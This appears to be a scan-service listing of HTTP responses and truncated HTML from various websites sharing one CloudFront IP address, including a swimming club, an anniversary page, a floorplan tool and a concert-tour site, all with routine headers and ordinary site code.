Last-Modified: Sun, 04 Feb 2018 02:39:05 GMT
x-amz-server-side-encryption: AES256
Accept-Ranges: bytes
Server: AmazonS3
Date: Sat, 20 Dec 2025 23:14:46 GMT
ETag: "ce4f599ce4e1bbe8977e7e17965f7c9a"
X-Cache: Hit from cloudfront
Via: 1.1 ab21b6436bc1d51d57b228ad39b1fa54.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
X-Amz-Cf-Id: gnAl__5aL-WOgF2JJSiytw_kjoKbi-I_PPQxirbIFzfmLpkmpH0XHQ==
Age: 3040
Page title: River Swimmers Club
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>River Swimmers Club</title>
<meta property="og:title" content="River Swimmers Club" />
<meta property="og:type" content="website" />
<meta property="og:url" content="http://riverswimmers.club/" />
<meta property="og:image" content="http://riverswimmers.club/_img/rsc.jpg" />
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta/css/bootstrap.min.css" integrity="sha384-/Y6pD6FV/Vv2HJnA6t+vslU6fwYXjCFtcEpHbNJ0lyAFsXTsjBbfaDjzALeQsN6M"
crossorigin="anonymous">
<script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN"
crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.11.0/umd/popper.min.js" integrity="sha384-b/U6ypiBEHpOf/4+1nzFpr53nxSS+GLCkfwBdFNTxtclqqenISfwAzpKaMNFNmj4"
crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta/js/bootstrap.min.js" integrity="sha384-h0AbiXch4ZDo7tp9hKZ4TsHbi047NrKGLO3SEJAg45jXxnGIfYzk4Si90RDIqNm1"
crossorigin="anonymous"></script>
<link href="https://vjs.zencdn.net/6.2.7/video-js.css" rel="stylesheet">
<!-- If you'd like to support IE8 -->
<script src="https://vjs.zencdn.net/ie8/1.1.2/videojs-ie8.min.js"></script>
<link rel="stylesheet" href="/_css/styles.css">
<script src="plyr/plyr.js" crossorigin="anonymous"></script>
<link rel="stylesheet" href="plyr/plyr.css">
<script>
(function (i, s, o, g, r, a, m) {
i['GoogleAnalyticsObject'] = r;
i[r] = i[r] || function () {
(i[r].q = i[r].q || []).push(arguments)
}, i[r].l = 1 * new Date();
a = s.createElement(o),
m = s.getElementsByTagName(o)[0];
a.async = 1;
a.src = g;
m.parentNode.insertBefore(a, m)
})(window, document, 'script', 'https://www.google-analytics.com/analytics.js', 'ga');
ga('create', 'UA-44024954-4', 'auto');
ga('send', 'pageview');
</script>
<script src="https://www.gstatic.com/firebasejs/4.4.0/firebase.js"></script>
<script>
// Initialize Firebase
var config = {
apiKey: "AIzaSyCYxdDdn-0DkSLV4fgeds1ELzznRFyDHfI",
authDomain: "riverswimmers-club.firebaseapp.com",
databaseURL: "https://riverswimmers-club.firebaseio.com",
projectId: "riverswimmers-club",
storageBucket: "riverswimmers-club.appspot.com",
messagingSenderId: "55477810250"
};
firebase.initializeApp(config);
</script>
<script type="text/javascript">
/**
* Handles the sign in button press.
*/
function toggleSignIn() {
if (firebase.auth().currentUser) {
// [START signout]
firebase.auth().signOut();
// [END signout]
} else {
var email = document.getElementById('email').value;
var password = document.getElementById('password').value;
if (email.length < 4) {
alert('Please enter an email address.');
return;
}
if (password.length < 4) {
alert('Please enter a password.');
return;
}
// Sign in with email and pass.
// [START authwithemail]
firebase.auth().signInWithEmailAndPassword(email, password).catch(function (error) {
// Handle Errors here.
var errorCode = error.code;
var errorMessage = error.message;
// [START_EXCLUDE]
if (errorCode === 'auth/wrong-password') {
alert('Wrong
Open service 13.32.99.35:443 · www.jazyemilio.com
2025-12-20 23:13
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 6803
Connection: close
Date: Sat, 20 Dec 2025 23:13:52 GMT
ETag: "471po41rxw58x"
x-nextjs-cache: HIT
x-nextjs-prerender: 1
x-nextjs-stale-time: 4294967294
x-powered-by: Next.js
Cache-Control: s-maxage=31536000,
Vary: Accept-Encoding
X-Cache: Hit from cloudfront
Via: 1.1 a54cda8ccda3480314f451558e4dd062.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
Alt-Svc: h3=":443"; ma=86400
X-Amz-Cf-Id: w4-YuS9WfzpKU5Fwq7tEKTkCIU5AOxf-qdSYM6XweYJOEj1TFfqVvQ==
Page title: 1 Year Anniversary
<!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="preload" href="/_next/static/media/569ce4b8f30dc480-s.p.woff2" as="font" crossorigin="" type="font/woff2"/><link rel="preload" href="/_next/static/media/93f479601ee12b01-s.p.woff2" as="font" crossorigin="" type="font/woff2"/><link rel="stylesheet" href="/_next/static/css/74a7be6fb641b609.css" data-precedence="next"/><link rel="preload" as="script" fetchPriority="low" href="/_next/static/chunks/webpack-aad2b71e0a59891b.js"/><script src="/_next/static/chunks/4bd1b696-dea39ae1858ce198.js" async=""></script><script src="/_next/static/chunks/517-2409c0bad003528d.js" async=""></script><script src="/_next/static/chunks/main-app-950337a2260c22e4.js" async=""></script><script src="/_next/static/chunks/app/page-42bc17d5975cf7d3.js" async=""></script><meta name="next-size-adjust" content=""/><title>1 Year Anniversary</title><meta name="description" content="Generated by Emilio"/><link rel="icon" href="/favicon.ico" type="image/x-icon" sizes="16x16"/><script src="/_next/static/chunks/polyfills-42372ed130431b0a.js" noModule=""></script></head><body class="__variable_4d318d __variable_ea5f4b antialiased"><main><div class="min-h-screen bg-gray-900 p-8 font-mono"><div class="max-w-5xl mx-auto"><div class="bg-black rounded-lg shadow-lg overflow-hidden border border-green-500/30"><div class="bg-black px-4 py-2 flex items-center border-b border-green-500/30"><div class="flex space-x-2"><div class="w-3 h-3 bg-red-500 rounded-full"></div><div class="w-3 h-3 bg-yellow-500 rounded-full"></div><div class="w-3 h-3 bg-green-500 rounded-full"></div></div><div class="ml-4 text-green-500 text-sm">Enero 20, 2025</div></div><div class="p-6"><div class="grid grid-cols-1 gap-8"><div class="transition-opacity duration-100 animate-[pulse_1s_ease-in-out_infinite] items-center flex flex-col"><div class="font-mono text-green-500 whitespace-pre">
********* *********
*********** *********
***********************
***********************
***********************
*********************
*******************
*****************
***************
*************
***********
*********
*******
*****
***
*
</div></div><div class="font-mono text-green-500 text-center">Hola novia :)</div><div class="font-mono text-green-500 text-center">Te quiero mucho</div><div class="font-mono text-green-500 text-center">Gracias por este año</div><div class="flex justify-center"><input type="password" placeholder="Contraseña ..." class="bg-transparent border border-green-500/30 rounded px-4 py-2 text-green-500 placeholder-green-500/50 focus:outline-none focus:border-green-500 w-64" value=""/></div></div></div></div></div></div></main><script src="/_next/static/chunks/webpack-aad2b71e0a59891b.js" async=""></script><script>(self.__next_f=self.__next_f||[]).push([0])</script><script>self.__next_f.push([1,"1:\"$Sreact.fragment\"\n2:I[5244,[],\"\"]\n3:I[3866,[],\"\"]\n4:I[3704,[\"974\",\"static/chunks/app/page-42bc17d5975cf7d3.js\"],\"default\"]\n5:I[6213,[],\"OutletBoundary\"]\n7:I[6213,[],\"MetadataBoundary\"]\n9:I[6213,[],\"ViewportBoundary\"]\nb:I[4835,[],\"\"]\n:HL[\"/_next/static/media/569ce4b8f30dc480-s.p.woff2\",\"font\",{\"crossOrigin\":\"\",\"type\":\"font/woff2\"}]\n:HL[\"/_next/static/media/93f479601ee12b01-s.p.woff2\",\"font\",{\"crossOrigin\":\"\",\"type\":\"font/woff2\"}]\n:HL[\"/_next/static/css/74a7be6fb641b609.css\",\"style\"]\n"])</script><script>self.__next_f.push([1,"0:{\"P\":null,\"b\":\"Ck7sHhi1BFgmLyH_gA1y2\",\"p\":\"\",\"c\":[\"\",\"\"],\"i\":false,\"f\":[[[\"\",{\"children\":[\"__PAGE__\",{}]},\"$undefined\",\"$undefined\",true],[\"\",[\"$\",\"$1\",\"c\",{\"children\":[[[\"$\",\"link\",\"0\",{\"rel\":\"stylesheet\",\"href\":\"/_next/static/css/74a7be6fb641b609.css\",\"precedence\":\"next\",\"crossOrigin\":\"$undefined\",\"nonce\":\"$undefined\"}]],[\"$\",\"html\",null,{\"lang\":\"en\",\"children\":[\"$\",\"body\",null,{\"className\":\"__variable_4d318d __variable_
Open service 13.32.99.35:443 · sf.richter-rw.de
2025-12-20 16:06
HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=iso-8859-1 Content-Length: 301 Connection: close Date: Sat, 20 Dec 2025 11:51:37 GMT Server: Apache Location: https://www.richter-rw.de/ X-Cache: Hit from cloudfront Via: 1.1 5492e1c9a06f2320204e7fcc383cff5c.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: 8N1jjU9BwDJIs0WPFk9VAHdrshbIgcTYl2N4j4896DmawIiHjvEZPQ== Age: 15278 Page title: 301 Moved Permanently <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="https://www.richter-rw.de/">here</a>.</p> <hr> <address>Apache Server at www.richter-rw.de Port 80</address> </body></html>
Open service 13.32.99.35:443 · mastersuite.com
2025-12-20 15:52
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 2976
Connection: close
Date: Fri, 19 Dec 2025 23:31:07 GMT
Last-Modified: Wed, 21 Oct 2020 03:10:47 GMT
ETag: "166b685d213cebc0f3a7336fd56d85d8"
Accept-Ranges: bytes
Server: AmazonS3
X-Cache: Hit from cloudfront
Via: 1.1 0a71d283a25c1e3f082b4dbc9d844dfe.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
X-Amz-Cf-Id: I9vcZhYaYJVshxbOHSpKOAqfTdWDkUXzz_QboGQ3m3G6ha_iYuR5wQ==
Age: 58882
Page title: MasterSuite
<!doctype html><html lang="en"><head><meta charset="utf-8"/><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="expires" content="0"><meta http-equiv="pragma" content="no-cache"><link rel="shortcut icon" href="/favicon.ico"/><link href="https://use.fontawesome.com/releases/v5.0.1/css/all.css" rel="stylesheet"><meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no"/><meta name="theme-color" content="#000000"/><meta name="description" content="Generate free floorplans for a house fast and easily in 3D & 2D on any device."/><link rel="manifest" href="/manifest.json"/><link href="https://fonts.googleapis.com/css?family=Montserrat:400,700,200" rel="stylesheet"/><link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.1/css/all.css" integrity="sha384-fnmOCqbTlWIlj8LyTjo7mOUStjsKC4pOpQbqyi7RrhN7udi9RwhKkMHpvLbHG9Sr" crossorigin="anonymous"><title>MasterSuite</title><script data-ad-client="ca-pub-1272955356336444" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><link href="/static/css/2.790a2e7e.chunk.css" rel="stylesheet"><link href="/static/css/main.d75480aa.chunk.css" rel="stylesheet"></head><body><noscript>You need to enable JavaScript to run this app.</noscript><div id="root"></div><script>!function(e){function r(r){for(var n,l,a=r[0],i=r[1],p=r[2],c=0,s=[];c<a.length;c++)l=a[c],Object.prototype.hasOwnProperty.call(o,l)&&o[l]&&s.push(o[l][0]),o[l]=0;for(n in i)Object.prototype.hasOwnProperty.call(i,n)&&(e[n]=i[n]);for(f&&f(r);s.length;)s.shift()();return u.push.apply(u,p||[]),t()}function t(){for(var e,r=0;r<u.length;r++){for(var t=u[r],n=!0,a=1;a<t.length;a++){var i=t[a];0!==o[i]&&(n=!1)}n&&(u.splice(r--,1),e=l(l.s=t[0]))}return e}var n={},o={1:0},u=[];function l(r){if(n[r])return n[r].exports;var t=n[r]={i:r,l:!1,exports:{}};return e[r].call(t.exports,t,t.exports,l),t.l=!0,t.exports}l.m=e,l.c=n,l.d=function(e,r,t){l.o(e,r)||Object.defineProperty(e,r,{enumerable:!0,get:t})},l.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},l.t=function(e,r){if(1&r&&(e=l(e)),8&r)return e;if(4&r&&"object"==typeof e&&e&&e.__esModule)return e;var t=Object.create(null);if(l.r(t),Object.defineProperty(t,"default",{enumerable:!0,value:e}),2&r&&"string"!=typeof e)for(var n in e)l.d(t,n,function(r){return e[r]}.bind(null,n));return t},l.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return l.d(r,"a",r),r},l.o=function(e,r){return Object.prototype.hasOwnProperty.call(e,r)},l.p="/";var a=this["webpackJsonpreact-three-boilerplate"]=this["webpackJsonpreact-three-boilerplate"]||[],i=a.push.bind(a);a.push=r,a=a.slice();for(var p=0;p<a.length;p++)r(a[p]);var f=i;t()}([])</script><script src="/static/js/2.d9ee60b8.chunk.js"></script><script src="/static/js/main.05247e34.chunk.js"></script></body></html>
Open service 13.32.99.35:443 · kingwild.vip
2025-12-20 08:04
HTTP/1.1 403 Forbidden Server: CloudFront Date: Sat, 20 Dec 2025 08:04:20 GMT Content-Type: text/html Content-Length: 919 Connection: close X-Cache: Error from cloudfront Via: 1.1 c43915e0cad14ee7685e5f74a99ce93c.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: LsAsYiZHLOjpUryxhzgeX8O8vUSwnaCalJnhvcGzBQ_AjvNiYo8YUQ== Page title: ERROR: The request could not be satisfied <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"> <TITLE>ERROR: The request could not be satisfied</TITLE> </HEAD><BODY> <H1>403 ERROR</H1> <H2>The request could not be satisfied.</H2> <HR noshade size="1px"> Request blocked. We can't connect to the server for this app or website at this time. There might be too much traffic or a configuration error. Try again later, or contact the app or website owner. <BR clear="all"> If you provide content to customers through CloudFront, you can find steps to troubleshoot and help prevent this error by reviewing the CloudFront documentation. <BR clear="all"> <HR noshade size="1px"> <PRE> Generated by cloudfront (CloudFront) Request ID: LsAsYiZHLOjpUryxhzgeX8O8vUSwnaCalJnhvcGzBQ_AjvNiYo8YUQ== </PRE> <ADDRESS> </ADDRESS> </BODY></HTML>
Open service 13.32.99.35:443 · triathlon-lumina.com
2025-12-19 08:38
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Date: Fri, 19 Dec 2025 08:38:35 GMT Link: <https://triathlon-lumina.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Set-Cookie: AWSALB=2XlrFknFR97SIM2ZJURSk+DIiWtefIQYda75h6qi+qd6uWU6AtKIz99wegc4rcSoydSmGhYznRnFH6bmJOT0MqpPVPCAD7wN7B9zyCIozxE5xKORl/dzfVl+4W94; Expires=Fri, 26 Dec 2025 08:38:34 GMT; Path=/ Set-Cookie: AWSALBCORS=2XlrFknFR97SIM2ZJURSk+DIiWtefIQYda75h6qi+qd6uWU6AtKIz99wegc4rcSoydSmGhYznRnFH6bmJOT0MqpPVPCAD7wN7B9zyCIozxE5xKORl/dzfVl+4W94; Expires=Fri, 26 Dec 2025 08:38:34 GMT; Path=/; SameSite=None Set-Cookie: uk5f046a4df0598=9aa30e9ecfc32ccc93909ee8523937f6; path=/; secure; HttpOnly; SameSite=None Server: Apache/2.4.38 (Debian) X-Powered-By: PHP/7.3.19 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Cache: Miss from cloudfront Via: 1.1 5b6e22c950501920595c86fc25834582.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: SAo6LWoAkm0nLusqUu-Oc0qvLQ8SIug2FFKqzFuvdQqjmARggq_SGw==
Open service 13.32.99.35:443 · n.fplr.co
2025-12-19 08:12
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 241
Connection: close
Date: Sat, 13 Dec 2025 01:24:11 GMT
Cache-Control: public, max-age=31560000
Last-Modified: Mon, 06 Mar 2023 06:10:03 GMT
Etag: "8117852eb62459b0b3698e8f25b810fb"
Server: AmazonS3
Via: 1.1 372875ad1ec20daf24f3f29f14a73cd0.cloudfront.net (CloudFront)
Age: 542929
X-Cache: Hit from cloudfront
X-Amz-Cf-Pop: FRA60-P3
X-Amz-Cf-Id: Gc4a5yEC0zQKbZ6rgCbAYPrzllcfJIAgrWZmD2BYNaVomuTNfxbJ9A==
<!DOCTYPE html>
<html>
<head></head>
<body>
<style>
[v-cloak] {
display: none;
}
</style>
<div id="app" v-cloak></div>
<div id="debug" v-cloak></div>
<script src="./popup.js"></script>
</body>
</html>
Open service 13.32.99.35:443 · www.botaspeao.com.br
2025-12-19 04:23
HTTP/1.1 403 Forbidden Server: CloudFront Date: Fri, 19 Dec 2025 04:23:43 GMT Content-Type: text/html Content-Length: 919 Connection: close X-Cache: Error from cloudfront Via: 1.1 8b889e35789d2b97f2ba8771acc9a008.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: mOMy1iR7Jd9VPctjLyVD_aP4B62qNMjcxN3WkV54vQJNwUYbHD_c2g== X-Frame-Options: SAMEORIGIN Referrer-Policy: strict-origin-when-cross-origin Content-Security-Policy: frame-ancestors 'self'; block-all-mixed-content; upgrade-insecure-requests; X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Permissions-Policy: camera=(), microphone=() Page title: ERROR: The request could not be satisfied <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"> <TITLE>ERROR: The request could not be satisfied</TITLE> </HEAD><BODY> <H1>403 ERROR</H1> <H2>The request could not be satisfied.</H2> <HR noshade size="1px"> Request blocked. We can't connect to the server for this app or website at this time. There might be too much traffic or a configuration error. Try again later, or contact the app or website owner. <BR clear="all"> If you provide content to customers through CloudFront, you can find steps to troubleshoot and help prevent this error by reviewing the CloudFront documentation. <BR clear="all"> <HR noshade size="1px"> <PRE> Generated by cloudfront (CloudFront) Request ID: mOMy1iR7Jd9VPctjLyVD_aP4B62qNMjcxN3WkV54vQJNwUYbHD_c2g== </PRE> <ADDRESS> </ADDRESS> </BODY></HTML>
Open service 13.32.99.35:80 · www.botaspeao.com.br
2025-12-19 04:23
HTTP/1.1 301 Moved Permanently Server: CloudFront Date: Fri, 19 Dec 2025 04:23:44 GMT Content-Type: text/html Content-Length: 167 Connection: close Location: https://www.botaspeao.com.br/ X-Cache: Redirect from cloudfront Via: 1.1 4612dc3b414cf2057f542e94733d59bc.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: PhkxAHo4_e7VCEZbh8PYe6NVgs-hSLnr_kkD8JXjWyydUiryWqkBIQ== X-Frame-Options: SAMEORIGIN Referrer-Policy: strict-origin-when-cross-origin Content-Security-Policy: frame-ancestors 'self'; block-all-mixed-content; upgrade-insecure-requests; X-Content-Type-Options: nosniff Permissions-Policy: camera=(), microphone=() Page title: 301 Moved Permanently <html> <head><title>301 Moved Permanently</title></head> <body> <center><h1>301 Moved Permanently</h1></center> <hr><center>CloudFront</center> </body> </html>
Open service 13.32.99.35:80 · ryandev.amris.aus.vet
2025-12-19 04:19
HTTP/1.1 301 Moved Permanently Server: CloudFront Date: Fri, 19 Dec 2025 04:19:51 GMT Content-Type: text/html Content-Length: 167 Connection: close Location: https://ryandev.amris.aus.vet/ X-Cache: Redirect from cloudfront Via: 1.1 5492e1c9a06f2320204e7fcc383cff5c.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: otUk4aUefG1hnLOlPmFMVGcfzyAa7THxOyIa9b-TLXwmNHL87CFGAw== Page title: 301 Moved Permanently <html> <head><title>301 Moved Permanently</title></head> <body> <center><h1>301 Moved Permanently</h1></center> <hr><center>CloudFront</center> </body> </html>
Open service 13.32.99.35:443 · ryandev.amris.aus.vet
2025-12-19 04:19
HTTP/1.1 403 Forbidden Content-Type: application/xml Transfer-Encoding: chunked Connection: close Server: AmazonS3 Date: Fri, 19 Dec 2025 04:19:49 GMT X-Cache: Error from cloudfront Via: 1.1 7fd88bab22735486702d23ba4e028d86.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: 7uyVof856Xkjv6uBMF_UcC0460RX5q7eVoB2tfKVBNwUjrYQlL2MtQ== <?xml version="1.0" encoding="UTF-8"?> <Error><Code>AccessDenied</Code><Message>Access Denied</Message></Error>
Open service 13.32.99.35:443 · mstd.tool.stg-tvlk.tech
2025-12-19 03:54
HTTP/1.1 403 Forbidden
Server: CloudFront
Date: Fri, 19 Dec 2025 03:54:45 GMT
Content-Length: 61
Connection: close
Content-Type: application/json
X-Cache: Error from cloudfront
Via: 1.1 8b889e35789d2b97f2ba8771acc9a008.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
X-Amz-Cf-Id: o4HEBhPewGmw5dR1upnPn4GlUq5eo9YpeHyFm-6i9-M8QcEn93bhbA==
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
{
"error" : "Internal resource please use VPN to access."
}
Open service 13.32.99.35:80 · mstd.tool.stg-tvlk.tech
2025-12-19 03:54
HTTP/1.1 301 Moved Permanently Server: CloudFront Date: Fri, 19 Dec 2025 03:54:44 GMT Content-Type: text/html Content-Length: 167 Connection: close Location: https://mstd.tool.stg-tvlk.tech/ X-Cache: Redirect from cloudfront Via: 1.1 c80ae6bd97b709ed6e4747f0d5ea4efc.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: quiuTcKKXtqzhrqWS91it6TR55gM4HU738u36pWscKH3Rzd2d3ZI4Q== X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Referrer-Policy: strict-origin-when-cross-origin X-Content-Type-Options: nosniff Page title: 301 Moved Permanently <html> <head><title>301 Moved Permanently</title></head> <body> <center><h1>301 Moved Permanently</h1></center> <hr><center>CloudFront</center> </body> </html>
Open service 13.32.99.35:443 · www.adaytoremembertour2025.com
2025-12-19 03:49
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 12278
Connection: close
Date: Fri, 19 Dec 2025 03:49:46 GMT
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Nov 2025 01:10:26 GMT
ETag: "5862448f386ed1b50a7d05ff2f820b3f"
Server: AmazonS3
X-Cache: Hit from cloudfront
Via: 1.1 efb4ddf9650598b987ef5db782c5b530.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
X-Amz-Cf-Id: sX0ElhsiwcttW1owiHGDzlrTKc6hBUQ01h70rbnUI-M1ERWKfYUiLg==
Age: 1
Page title:
A Day To Remember Tour 2025 - Cities, Dates, Tickets
<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6" lang="en"> <![endif]-->
<!--[if IE 7 ]><html class="ie ie7" lang="en"> <![endif]-->
<!--[if IE 8 ]><html class="ie ie8" lang="en"> <![endif]-->
<!--[if (gte IE 9)|!(IE)]><!-->
<html lang="en">
<!--<![endif]-->
<head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" /><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Montserrat:400,700" /><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800" />
<script>
function getCookie(n) { for (var t = n + '=', r = document.cookie.split(';'), e = 0; e < r.length; e++) { for (var i = r[e]; ' ' == i.charAt(0);)i = i.substring(1, i.length); if (0 === i.indexOf(t)) return decodeURIComponent(i.substring(t.length, i.length)) } return null }
function setCookie(n, v, days) { var e = ''; if (days) { var d = new Date(); d.setTime(d.getTime() + days * 24 * 60 * 60 * 1000); e = ';expires=' + d.toGMTString(); } document.cookie = n + '=' + v + e + ';domain=.adaytoremembertour2025.com;path=/'; }
function clientReroute(url) {
var crrc = { 'referrer': document.referrer, 'landing': window.location.href, 'reroute': url };
if (getCookie('crrc') !== null) { crrc = JSON.parse(getCookie('crrc')); crrc.reroute = url; }
setCookie('crrc', JSON.stringify(crrc));
window.location.replace(url);
}
window.hg = true;
var siteVer = '1777380863';
window.xmgr = {
_ts: performance.now(),
_arr: [],
_track: function () { },
push: function (s, p) {
this._arr.push([s, performance.now() - this._ts, p]);
this._track();
},
gsxp: function (n, r, d = 30) { var o = 'xp_' + n, t = getCookie(o); return t || setCookie(o, t = r[Math.floor(Math.random() * r.length)], d), t; }
};
window.xmgr.push('pageview',{"evc":0});
var xjst = document.createElement('script');
xjst.src = '/actv/xmgrjs?v=' + Date.now();
xjst.async = true;
document.head.appendChild(xjst);
var sv2301a = window.xmgr.gsxp('2301a', ['a', 'b'], 15);
</script>
<script src="/VerBust.js" async></script>
<title>
A Day To Remember Tour 2025 - Cities, Dates, Tickets
</title><link rel="canonical" href="https://www.adaytoremembertour2025.com/" /><meta name="author" content="A Day To Remember" /><meta name="description" content="Join the journey with A Day To Remember on their 2025 tour. Immerse yourself in a powerful blend of emotion and energy at their unforgettable live performances." /><link rel="apple-touch-icon" sizes="180x180" href="/static/apple-touch-icon.png" /><link rel="icon" type="image/png" sizes="32x32" href="/static/favicon-32x32.png" /><link rel="icon" type="image/png" sizes="16x16" href="/static/favicon-16x16.png" /><link rel="stylesheet" href="/static/1.2/css/bootstrap.min.css" /><link rel="stylesheet" href="/static/1.2/css/font-awesome.min.css" /><link rel="stylesheet" href="/static/1.2/css/animate.min.css" /><link rel="stylesheet" href="/static/1.2/css/style.css" /><link rel="stylesheet" href="/static/1.2/css/colors/orange.css" />
<style>
#blurb {
margin-bottom: 60px; text-wrap: pretty;
}
#blurb h2, #blurb h3 {
margin: -5px 0 15px 0;
font-size: 25px;
}
@media ( max-width: 767px ) {
#hero-final {
font-size: 11pt;
}
#blurb h2, #blurb h3 {
font-size: 20px;
}
}
@media ( max-width: 479px ) {
#hero-final {
font-size: 9pt;
}
#blurb h2, #blurb h3 {
font-size: 18px;
}
}
.highlighter{padding:5px 2px;background-color:rgba(243,174,115,.05);}
@media(min-width: 992px){.highlighter{padding:10px 5px;}}
.hero-buttons{margin-bottom:30px;}
@media(min-width: 992px){.hero-buttons{margin-bottom:40px;}}
#BigUnofficial {
position: fixed;
top: 68px;
right: 0;
bottom: auto;
left: 35px;
z-index: 101;
text-align: left;
opacity: .85;
display: none;
}
@media (min-width: 992px) {
#BigUnofficial {
display: block;
}
}
#BigUnofficial span {
background-color: #333;
padding: 3px 8px;
border: 1px solid #444;
color: #FAFAD2;
font-weight: bold;
font-size: 11pt;
cursor: default;
}
#Big
Open service 13.32.99.35:80 · www.adaytoremembertour2025.com
2025-12-19 03:49
HTTP/1.1 301 Moved Permanently Server: CloudFront Date: Fri, 19 Dec 2025 03:49:46 GMT Content-Type: text/html Content-Length: 167 Connection: close Location: https://www.adaytoremembertour2025.com/ X-Cache: Redirect from cloudfront Via: 1.1 372875ad1ec20daf24f3f29f14a73cd0.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: 2eAFt8cE5ZwOOGkGHEoxKCzDxfMrXIrESiVO6TX20xH6adpHGIIQgQ== Page title: 301 Moved Permanently <html> <head><title>301 Moved Permanently</title></head> <body> <center><h1>301 Moved Permanently</h1></center> <hr><center>CloudFront</center> </body> </html>
Open service 13.32.99.35:443 · adaytoremembertour2025.com
2025-12-19 03:49
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 12278
Connection: close
Date: Fri, 19 Dec 2025 03:49:46 GMT
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Nov 2025 01:10:26 GMT
ETag: "5862448f386ed1b50a7d05ff2f820b3f"
Server: AmazonS3
X-Cache: Hit from cloudfront
Via: 1.1 987865b81ba895db5b3f56f8ae175c84.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
X-Amz-Cf-Id: 6G-IXRI4D_nF6b_6jzRi3Mg2PxfRWcmSSkEEVFPdVrWovwDcgNf-ag==
Page title:
A Day To Remember Tour 2025 - Cities, Dates, Tickets
<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6" lang="en"> <![endif]-->
<!--[if IE 7 ]><html class="ie ie7" lang="en"> <![endif]-->
<!--[if IE 8 ]><html class="ie ie8" lang="en"> <![endif]-->
<!--[if (gte IE 9)|!(IE)]><!-->
<html lang="en">
<!--<![endif]-->
<head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" /><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Montserrat:400,700" /><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800" />
<script>
